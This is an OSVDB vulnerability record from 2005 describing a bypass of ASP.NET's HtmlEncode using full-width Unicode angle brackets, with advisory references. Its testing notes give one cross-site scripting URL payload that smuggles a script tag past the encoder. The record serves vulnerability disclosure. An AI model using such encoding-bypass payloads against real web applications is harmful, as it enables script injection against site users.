Microsoft ASP.NET HttpServerUtility.HtmlEncode Unicode Character Bypass

2005-02-16T09:28:01
ID OSVDB:13928
Type osvdb
Reporter OSVDB
Modified 2005-02-16T09:28:01

Description

Manual Testing Notes

http://[victim]/attack3.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

References:

Secunia Advisory ID: 14214
Related OSVDB ID: 13926
Related OSVDB ID: 13927
Other Advisory URL: http://it-project.ru/andir/docs/aspxvuln/aspxvuln.en.xml
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0251.html